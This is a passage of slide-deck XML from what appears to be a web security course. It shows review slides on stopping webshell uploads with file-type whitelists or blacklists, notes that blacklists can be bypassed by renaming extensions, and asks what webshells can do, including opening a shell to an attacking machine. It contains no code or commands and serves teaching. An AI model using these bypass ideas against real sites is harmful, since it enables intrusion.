              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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9" name="Shape 1069"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1070" name="Google Shape;1070;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71" name="Google Shape;1071;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Bypassing Filters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1072" name="Google Shape;1072;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3" name="Google Shape;1073;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1294450"/>
            <a:ext cx="9144000" cy="1302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t>Suppose the web application you're assessing has a photo upload feature.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>State one technique for preventing users from uploading webshells.</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Is there any way to bypass your suggested fix? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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79" name="Google Shape;107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Bypassing Filters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1080" name="Google Shape;108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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1294450"/>
            <a:ext cx="9144000" cy="3411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Suppose the web application you're assessing has a photo upload feature.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>State one technique for preventing users from uploading webshells.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>You could use a whitelist of allowed file types (i.e., only allow PNG, JPG/JPEG, etc.). Alternatively, you could use a blacklist of disallowed file types (i.e., don't allow PHP, Python, etc.)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Is there any way to bypass your suggested fix? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Blacklists can be bypassed by simply changing the file extension. Whitelists may be more robust to this bypass, as the web application can be configured to handle files of each allowed type in a specifically, secure way.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="80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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087;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8" name="Google Shape;1088;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="665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Thinking Critically</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Google Shape;1089;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64550" y="1163000"/>
            <a:ext cx="9144000" cy="1302600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to run commands with sudo? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to add or modify a user, or change group membership? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to open an interactive shell to an attacking machine? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="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